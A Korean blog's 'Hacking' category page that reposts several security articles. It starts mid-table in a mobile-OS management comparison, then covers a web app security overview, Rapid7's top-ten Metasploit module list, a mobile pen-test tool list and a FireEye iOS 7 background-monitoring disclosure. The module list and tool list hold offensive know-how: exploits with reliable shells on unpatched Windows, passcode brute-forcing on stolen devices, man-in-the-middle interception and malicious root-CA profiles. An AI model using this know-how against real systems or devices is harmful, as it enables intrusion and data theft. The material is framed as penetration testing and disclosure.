Allow S/MIME soft certsNoNoNoNoNo**

Native security and management API capabilities compared
The other form of mobile security comes from the APIs in each mobile OS. These APIs vary widely across the OSes, and each requires a management tool. Many MDM tools support multiple mobile OSes, providing a single console for IT admins. Some also offer client apps that add capabilities not found in the native APIs, though this typically forces users to opt for proprietary email and other apps for business purposes. Table 2 on the next page shows some of the more commonly requested management features typically implemented through APIs.

Apple, for example, has several dozen such APIs that use remotely installed configuration profiles not only to configure various iOS settings (such as preconfiguring VPN or allowed access points) but also to manage app behavior (such as disallowing the forwarding of corporate messages via personal accounts in Mail). iOS 6 added several new policies, including the ability to prevent app removal, lock a user to a specific app (such as for kiosk or retail usage), and prevent paid apps from being purchased. All are part of what iOS calls a supervised environment, in which the iPhone or iPad is treated as an appliance. iOS 7 adds a set of APIs for application management, including managed Open In, per-app VPNs, managed copy and paste across apps, and single sign-on, as well as true license management and profile-based app installation.

Along the same lines, in Windows Phone 8, Microsoft supports the ability to revoke applications, restrict email forwarding, remotely enroll or unenroll devices, and remotely update business-provisioned apps. One capability in Windows Phone 8 not available to other mobile OSes is its integration with Active Directory, notes Ahmed Datoo, vice president of marketing at MDM vendor Zenprise. This means that MDM tools such as Zenprise’s can access the Active Directory groups, then assign policies to those groups rather than maintain a separate set of groups in the MDM tool from the set in Active Directory. That’s a time-saver for IT, he notes; it reduces the risk of employees not being in the correct groups for the policies that should apply or falling through the cracks when terminated in, say, Active Directory but not in the MDM tool’s user database.

Microsoft and Google provide far fewer such capabilities in their APIs, though Samsung and Google’s Motorola Mobility unit have added their own security APIs to their Android 4 devices. For example, Samsung’s SAFE APIs allow IT admins to disable cameras, Bluetooth, tethering, voice recording, SD cards, and Wi-Fi.

Microsoft uses a central manager in Windows Phone 8 called DM Client that contains all the relevant user and corporate profiles (like the Windows Registry, in effect), rather than rely on a set of separate installed configuration profiles (like the OS X System Folder, in effect). And on September 17, Microsoft finally attained FIPS 140-2 certification, joining BlackBerry 10, iOS 6 and 7, and Samsung SAFE Android devices for this key federal security standard. 

Then there’s BlackBerry, the godfather of mobile security and management. Its BES offers hundreds of controls, and its Balance technology lets IT create a partition on a BlackBerry 10 device to keep personal and work apps and data separate. BlackBerry has a fairly confusing set of MDM products as it transitions from its old BlackBerry platform to the new one; I detail its various MDM products and how they relate in the article “BlackBerry’s road map to unified mobile management.”

Table 2: Other native management capabilities compared

(Typically requires a mobile device management server to use)

 AppleGoogleSamsungBlackBerryMicrosoft
Capability iOS 6,7Android 4Android 4 + SAFEBlackBerry 10 + BES 10Windows Phone 8
EncryptionAES 256, user has no disable optionAES 128, user has disable option, only some models support encryption AES 256, user has disable option, not all devices support encryptionAES 256, user has disable option AES 256, user has no disable option

FIPS 140-2 certification

Yes
(Level 1)		NoSome models
(Level 1)		Yes
(Level 2)		Yes
(Level 1)

Over-the-air data encryption

Yes

Yes

YesYes

Yes

S/MIME

Yes

No

NoYes

No**

VPN

Yes

Yes

YesYes

No**

Configure VPNYesYesYes YesNo**

Restrict/block app stores

Yes

No

YesYes

Yes

Restrict/block wireless LANs

Yes

NoYesYesNo**
Configure allowable access pointsYesYesYes YesNo**
Signed apps requiredYesNoNoYesYes

Selective wipe of business apps and data only

Yes

No

YesYes

No**

Remotely update business appsYesNoYesYesYes
Secure bootYes Yes*YesYesYes
App sandboxingYesYesYes YesYes
Disable copy and pasteYesYesYesYesNo**
Disable iCloud/Microsoft Account/Google Account sync and storageYesNoYesYes

No**

 

How to think about mobile device management
Ojas Rege, vice president of strategy at MDM vendor MobileIron, describes three bands of management requirements that IT should be thinking about.

The first set of requirements is around configuration and protection of lost or compromised devices. That typically requires password enforcement, encryption enforcement, remote lock and wipe, remote email configuration, certificates for identity, remote connectivity configuration (such as for Wi-Fi and VPNs, though he says this configuration capability is not essential if usage is just for email and over cellular networks), and detection of compromised OSes (such as jailbroken, rooted, or malware-infected ones).

The second set of requirements is around data loss prevention (DLP), which covers privacy controls (such as for user location), cloud-usage controls (such as for iCloud, SkyDrive, and Google Docs), and email DLP controls (such as the ability to restrict email forwarding and to protect attachments). “More regulated environments may require No. 2, and these policies are still TBD for Windows Phone,” Rege notes. By contrast, iOS, BlackBerry, and Android have supported most of these needs since (respectively) iOS 4, BES 5, and Android 3, though a few — such as managing email forwards — are handled outside the OS by MDM clients such as MobileIron’s.

The third set of requirements is around apps, such as their provisioning and data security. Although both Apple and Microsoft have mechanisms to do at least basic app management — iOS can essentially hide an app so that it’s no longer available to a user, and Windows Phone 8 can update corporate apps remotely — mobile application management (MAM) capabilities are mostly up to the mobile management vendors to deploy, Rege says.

All the app stores but Google’s are highly curated. For their mobile OSes, Microsoft and BlackBerry copied Apple’s curated approach, which has kept malware off iOS. Android has no such rigorous control, and although Google now spends more effort to analyze apps, the Google Play market is full of malware. The feds recently announced that industrial-class spyware used in advanced persistent threats has now entered the Google Play market.

All four platforms provide mechanisms for businesses to deploy their own apps directly to users, so they can deploy and manage corporate apps separately from those that users get from the app store. Mobile mangement tools can connect these mechanisms to group policies and content-management controls.

It’s a no-brainer that iOS and BlackBerry 10 have what it takes for almost any business’s security needs. Android, especially if you get Samsung or Motorola devices, is a plausible platform if you’re not worried about the malware potential. Meanwhile, Windows Phone holds down the rear, appropriate for low-security requirements.


'Hacking' 카테고리의 다른 글

Wireless Hacking  (0) 2015.01.08
Hackademic-RTB2  (0) 2014.08.19
Web Application Security  (0) 2014.08.06
Top 10 Most Searched Metasploit Exploit and Auxiliary Modules  (0) 2014.06.12
Must-Have Tools: Software mobile  (0) 2014.04.19
Posted by CEOinIRVINE
l

Web Application Security

Hacking 2014. 8. 6. 04:07

Web Application Security

Posted in Technopedia, Application Security



Web application security is a branch of Information Security that deals specifically with security of websites and web applications.

At a high level, Web application security draws on the principles of Application Security but applies them specifically to Internet and Web systems. Typically web applications are developed using programming languages such as PHP, J2EE, Java, ASP.NET, C#, VB.NET or Classic ASP.

Security Threats

With the emergence of Web 2.0, increased information sharing through Social Networking and increasing business adoption of the Web as a means of doing business and delivering service, websites are often attacked directly. Hackers either seek to compromise the corporate network or the end-users accessing the website by subjecting them to Drive-by downloading.

Web Application SecurityAs a result, industry is paying increased attention to the security of the web applications themselves in addition to the security of the underlying computer network and operating systems.

The majority of web application attacks occur through Cross Site Scripting and SQL Injection attacks which typically result from flawed coding, and failure to sanitize input to and output from the web application. These are ranked in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors.

Web Application Security Standards

OWASP is the emerging standards body for Web application security. In particular they have published the OWASP Top 10 which describes in detail the major threats against web applications. The Web Application Security Consortium (WASC) has created the Web Hacking Incident Database and also produced open source best practice documents on Web application security.

Web Application Security Technology

While security is fundamentally based on people and processes, there are a number of technical solutions to consider when designing, building and testing secure web applications. At a high level, these solutions include:
  • Black Box testing tools such as web application scanners, vulnerability scanners and penetration testing software
  • White Box testing tools such as static source code analyzers
  • Fuzzing Tools used for input testing
  • Web Application Firewalls(WAF) used to provide firewall-type protection at the web application layer
  • Password cracking tools for testing password strength and implementation
The web-based application security assessment process

The process of assessing the security of a web-based application, although not technically complex, often relies upon a multi-facetted approach utilising a variety of technologies and techniques. Unfortunately, there is currently no quick shrink-wrapped solution available to automatically and comprehensively assess an application's security. Various vendors can supply testing products that will search for the most basic faults in non-complex applications/environments and provide advice on better coding practices. Based upon experience in assessing critical Web-enabled applications, automated tools should only be used for first-round security testing and preliminary identification of potential flaws.

Depending on your specific requirements and the type of web-based application, an application security assessment should typically consist of the following phases:
  • Examination of external/client-side visible code for information that could be used for social engineering purposes or for information on how an application functions that might be used for a more focused attack.
  • Discovery of information on the type of environment that exists at the server side (eg, embedded SQL queries specific to a single database version).
  • Inspection of application validation and bounds checking both for accidental and mischievous input. The purpose of this exercise is to ascertain the limits of correct server responses when handling unexpected data formats or sizes. This phase involves buffer overflow attempts to establish system resilience and performance continuity.
  • Manipulation of client-side code and locally stored information such as cookies and session information. Client-side code is altered to subvert authentication checking and used to establish the bounds of server reliance on client data fields. URL request information and GET/PUT requests are altered to achieve unexpected system responses and access confidential information.
  • Examination of application-to-application interaction between system components such as the Web service and back-end data sources. Attempts are made to reference system components by impersonating other system functions or sources. Redirection methods and messaging functions are closely examined.
  • Discovery of techniques that could be employed by attackers to escalate their permissions by referencing application components with higher server-side permissions, or exploitation of race conditions to identify lax permission or authentication checking.
  • Attempts to subvert in-transit data between the client and server system. Examination of data delivery methods and the likelihood of their subversion or use in a replay-type attack, or other session orientated attacks, including an analysis of system responses to such data.
  • Authentication methods in use are examined for their robustness and resilience to various subversion techniques. Attempts are made to bypass authentication processes and/or impersonate valid logged-in users. Detailed studies of user segregation methods are undertaken and an analysis of server-side responses to failed attempts is made.
  • Overall examination of the application's deployment and security configuration from perceived threat models. Advice is given on secure deployment methodologies for the application type, based upon market considerations, new vulnerability developments and attack methodologies.


'Hacking' 카테고리의 다른 글

Hackademic-RTB2  (0) 2014.08.19
Mobile security: iOS vs. Android vs. BlackBerry vs. Windows Phone  (0) 2014.08.09
Top 10 Most Searched Metasploit Exploit and Auxiliary Modules  (0) 2014.06.12
Must-Have Tools: Software mobile  (0) 2014.04.19
Background Monitoring on Non-Jailbroken iOS 7 Devices — and a Mitigation  (0) 2014.02.26
Posted by CEOinIRVINE
l

Top 10 Most Searched Metasploit Exploit and Auxiliary Modules

Hacking 2014. 6. 12. 03:42
Previous postNext post

Exploit Database (DB)At Rapid7, we often get asked what the top 10 Metasploit modules are. This is a hard question to answer: What does "top" mean anyway? Is it a personal opinion, or what is being used in the industry? Because many Metasploit users work in highly sensitive environments, and because we respect our users' privacy, the product doesn't report any usage reports back to us.

 

We may have found a way to answer your questions: We looked at our metasploit.com web server stats, specifically theMetasploit Auxiliary and Exploit Database, which exploit and module pages were researched the most. Here they are, annotated with Tod Beardley's excellent comments:

 

  1. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody’s gotten RCE yet (in public), but the Metasploit module provides the most clues.

  2. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four year old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It’s also got a great pile of language pack targets. All of Metasploit’s exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you’ve ever heard of. This exploit is also not ancient, so it’s reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it.

  3. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six year old vulnerability that’s notable in that there’s no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice.

  4. Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine year old vulnerability that used to be the de-facto standard exploit for Windows machines -- this is the RPC DCom bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It’s now pretty much a case study in stack buffer overflows in Windows, so it’s got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2.

  5. Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop (CVE-2010-0017, MSB-MS10-006): Not sure why this module is popular -- it’s a client side DoS. Historically, it’s a neat DoS, since it demos a bug in Windows 7’s kernel, but all the module does is crash Windows 7 clients after you get a user to connect to you.

  6. Adobe PDF Embedded EXE Social Engineering (CVE-2010-1240): This module exploits CVE-2010-1240 in Adobe Reader. The idea is that you can embed and execute a Meterpreter PE Executable in a PDF, and when the user opens the PDF, surprise shells! Since it’s on this list, it’s probably the most popular social engineering-style module.

  7. Apache mod_isapi <= 2.2.14 Dangling Pointer (CVE-2010-0425): Although this is an exploit in Apache, don’t be fooled! It’s only exploitable on Windows (so that knocks out the biggest chunk of Apache installs at the time of this module’s release), and it’s only a DoS. Again, kind of a mystery as to why it’s so popular.

  8. Java AtomicReferenceArray Type Violation Vulnerability (CVE-2012-0507): This was initially discovered in the wild as a Java 0-day, and this module represented the fevered work of sinn3r and Juan Vazquez, who turned out the first reliable public cross-platform exploit for the bug. The blog post "CVE-2012-0507 - Java Strikes Again" shows a screenshot of Meterpreter sessions on Windows, Ubuntu, and OSX systems. In fact, this may be the first publicly demonstrable Java exploit that Just Works against all three platforms for the vulnerable versions of Java -- no extra configuration or fingerprinting is needed.

  9. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It’s not sexy, but it’s super handy for testing payloads and setup. Even though it’s a lowly #9, I’d bet it’s the most-used module in classroom and test environments.

  10. Microsoft Plug and Play Service Overflow (CVE-2005-1983, MSB-MS05-039): This exploits the Plug and Play service on Windows 2000. This is the exploit that MS06-040 replaced, though until MS06-040, this was the most reliable exploit around for Windows 2000. The Zotob worm used it. Note that while the exploit isn’t 100% reliable, failed attempts had a tendency to trigger a reboot of the target, so the next attempt would be 100% successful. In other words, for some people, the reboot-on-failure is really more of a feature than a bug.

 

Let us know if you find this ranking interesting so we can continue sharing it in the future. We're excited to see how this list will look next month, and what the major changes will be!

 

If you want to use any of these exploits right now, you can download Metasploit for free!


'Hacking' 카테고리의 다른 글

Mobile security: iOS vs. Android vs. BlackBerry vs. Windows Phone  (0) 2014.08.09
Web Application Security  (0) 2014.08.06
Must-Have Tools: Software mobile  (0) 2014.04.19
Background Monitoring on Non-Jailbroken iOS 7 Devices — and a Mitigation  (0) 2014.02.26
Making sure a web page is not cached, across all browsers  (0) 2014.01.31
Posted by CEOinIRVINE
l

Must-Have Tools: Software mobile

Hacking 2014. 4. 19. 05:34

Must-Have Tools: Software

  • Android Emulator and SDK Tools — The Android Emulator is almost as good as having real Android hardware since it can be used to run and assess Android applications. Pen testers can install the Android Emulator and the associated SDK tools for use in evaluating Android applications, and for attacking "stolen" Android devices. By Google http://developer.android.com/sdk
  • Plist Editor for Windows — The Plist Editor for Windows makes it easy to view and search binary or ASCII preference list files from compromised Apple iOS devices. Pen testers can use the Plist Editor for Windows to extract data from iOS built-in or third-party applications and harvest credentials or other sensitive data from numerous weak applications. By VOWSoft, Ltd.
    http://www.icopybot.com/plist-editor.htm
  • SQLiteSpy — SQLiteSpy reads, searches, and converts SQLite database files used on iOS and Android devices. Pen Testers can inspect the compromised contact, GPS history, browser history, SMS messages and more with SQLiteSpy. By Ralf Junker http://www.yunqa.de/delphi/doku.php/products/sqlitespy/index
  • Elcomsoft Phone Password Breaker* - EPPB is used to brute- force passwords on Apple iTunes backups, BlackBerry backups, and to bypass BlackBerry lock screen passcodes. Pen testers can use EPPB to decrypt and extract Apple and BlackBerry backup data from compromised hosts, and to bypass the passcode selection on BlackBerry devices. By Elcomsoft http://www.elcomsoft.com/eppb.html
  • iPhone Data Protection Tools — The iDPT suite creates an alternate iOS boot environment, allowing pen testers to brute-force PIN- based passcodes on older iPhone, iPod Touch and iPad devices. By Jonathan Zdziarski and a community of contributing developers http://code.google.com/p/iphone-dataprotection
  • Redsn0w — Redsn0w is an all-purpose iOS jailbreaking tool for iOS 5 devices. If device theft is in the scope of the mobile device pen test, the pen tester can jailbreak and access confidential data on stolen devices using Redsn0w. By iPhone Dev Team http://www.redsn0w.us
  • Satori — Satori is a multi-faceted passive operating system fingerprinting tool, combining results from over 25 different protocols for precise results. Pen testers can use Satori to monitor LAN or WLAN traffic and identify the mobile devices that are present to target. By Eric Kollmann http://chatteronthewire.org
  • Burp Suite* — Burp Suite is commonly used for web application assessments, but it also makes a powerful HTTP/S network manipulation tool when combined with a man-in-the-middle attack. Pen testers can use Burp Suite to exploit HTTP-based mobile applications with server-side and client- side injection attacks. By PortSwigger, Ltd. http://portswigger.net/burp
  • Ettercap — Ettercap is a powerful man-in-the-middle tool, adding powerful network traffic manipulation and plugin functionality to exploit downstream devices. Pen testers can use Ettercap to capture plaintext passwords, intercept SSL traffic, and manipulate DNS name resolution on mobile devices. By Alberto Ornaghi, Marco Valleri, Emilio Escobar, and Eric Milam http://ettercap.github.com/ettercap
  • Mercury Framework — The Mercury Framework is an Android security testing platform using a client/server architecture with plugin support for dynamic exploit delivery. Pen testers can use Mercury to evaluate the threat of malware on an Android platform, developing or leveraging available exploits to take advantage of Android platform vulnerabilities. By Daniel Bradberry https://github.com/mwrlabs/mercury
  • iPhone Configuration Utility — The iPCU tool from Apple provides a set of iOS device management features for small organizations, creating XML profiles that can be installed on iOS devices to specify wireless networks, platform settings, certificate trust, and more. Pen testers can use iPCU to create malicious profiles, adding the attacker as a new trusted root CA as part of a phishing assessment. By Apple Corporation http://www.apple.com/support/iphone/enterprise

Must-Have Tools: Hardware

  • Google Nexus* — The Google Nexus is the perfect hardware for experimenting with Android attacks with WiFi, Bluetooth, and NFC wireless capabilities. As a "Google Experience" device, the Nexus also receives software updates to stay current with new Android OS features. By Google http://www.google.com/nexus
  • iPad Mini* — A lower-cost alternative to an iPad or an unsubsidized iPhone, the iPad Mini runs all iOS applications. After jailbreaking the iPad Mini, pen testers can install and target vulnerable applications, or testthe impact of attacks before delivering them to the production target environment. By Apple Corporationhttp://www.apple.com/ipad-mini


'Hacking' 카테고리의 다른 글

Web Application Security  (0) 2014.08.06
Top 10 Most Searched Metasploit Exploit and Auxiliary Modules  (0) 2014.06.12
Background Monitoring on Non-Jailbroken iOS 7 Devices — and a Mitigation  (0) 2014.02.26
Making sure a web page is not cached, across all browsers  (0) 2014.01.31
pen test poster (mind map) vulnerable practice sites, OS builds, web apps  (0) 2013.12.03
Posted by CEOinIRVINE
l

Background Monitoring on Non-Jailbroken iOS 7 Devices — and a Mitigation

Hacking 2014. 2. 26. 01:40

Background Monitoring on Non-Jailbroken iOS 7 Devices — and a Mitigation

| By , and | Mobile Threats, Threat Intelligence, Threat Research, Vulnerabilities
Background monitoring mobile applications has become a hot topic on mobile devices. Existing reports show that such monitoring can be conducted on jailbroken iOS devices. FireEye mobile security researchers have discovered such vulnerability, and found approaches to bypass Apple's app review process effectively and exploit non-jailbroken iOS 7 successfully. We have been collaborating with Apple on this issue.
fig1
Fig.1 Background Monitoring

We have created a proof-of-concept "monitoring" app on non-jailbroken iOS 7.0.x devices. This “monitoring” app can record all the user touch/press events in the background, including, touches on the screen, home button press, volume button press and TouchID press, and then this app can send all user events to any remote server, as shown in Fig.1. Potential attackers can use such information to reconstruct every character the victim inputs.

Note that the demo exploits the latest 7.0.4 version of iOS system on a non-jailbroken iPhone 5s device successfully. We have verified that the same vulnerability also exists in iOS versions 7.0.5, 7.0.6 and 6.1.x. Based on the findings, potential attackers can either use phishing to mislead the victim to install a malicious/vulnerable app or exploit another remote vulnerability of some app, and then conduct background monitoring.

fig2
Fig.2 Background App Refresh Settings
fig3
Fig.3 Killing An App on iOS7

iOS7 provides settings for "background app refresh". Disabling unnecessary app's background refreshing contributes to preventing the potential background monitoring. However, it can be bypassed. For example, an app can play music in the background without turning on its "background app refresh" switch. Thus a malicious app can disguise itself as a music app to conduct background monitoring.

Before Apple fixes this issue, the only way for iOS users to avoid this security risk is to use the iOS task manager to stop the apps from running in the background to prevent potential background monitoring. iOS7 users can press the Home button twice to enter the task manager and see preview screens of apps opened, and then swipe an app up and out of preview to disable unnecessary or suspicious applications running on the background, as shown in Fig.3.

We conducted this research independently before we were aware of this recent report. We hope this blog could help users understand and mitigate this threat further.

Acknowledgement: Special thanks to Jari Salomaa for his valuable comments and feedback. We also thank Raymond Wei, Dawn Song and Zheng Bu for their valuable help on writing this blog.

'Hacking' 카테고리의 다른 글

Top 10 Most Searched Metasploit Exploit and Auxiliary Modules  (0) 2014.06.12
Must-Have Tools: Software mobile  (0) 2014.04.19
Making sure a web page is not cached, across all browsers  (0) 2014.01.31
pen test poster (mind map) vulnerable practice sites, OS builds, web apps  (0) 2013.12.03
Web Vulnerable Test Sites  (0) 2013.12.02
Posted by CEOinIRVINE
l
◀ 이전페이지 1 2 3 4 5 ··· 27 다음페이지 ▶
블로그 이미지
Information Security & US & Life & Love & Fashion & Hacking & Passion hack, web security, game security, game hack, fps, ava, wow, starcraft II, soldier front, gunz, reverse engineering, SQL injection, XSS, hacking, penetration testings, IT, internet technlogoy, security, penetratoin testing, XSS, XSRF CEOinIRVINE

최근에 올라온 글

공지사항

카테고리

CEOinIRVINE (2282)
Editorials (4)
Finance & EMBA (1)
Fashion (239)
IT (215)
Hacking (266)
Online Game (17)
Vocabulary (14)
iLoveBlackberry (2)
Business (1108)
Politics (165)
US News (115)
World News (63)
Career Consulting (8)
Apple (5)
Car (13)
Travel (5)
Irvine (3)
Sports (3)
recipe (1)
Music (15)
TVs (11)
Spanish (1)
Cyber Law (1)
Perl (3)
Java (1)
Artificial Intelligence (1)
Stock (1)

태그목록

달력

«   2024/05   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31

링크

  • Total :
  • Today :
  • Yesterday :
tistory 티스토리 가입하기!
rss

최근에 달린 댓글

최근에 받은 트랙백

글 보관함

티스토리툴바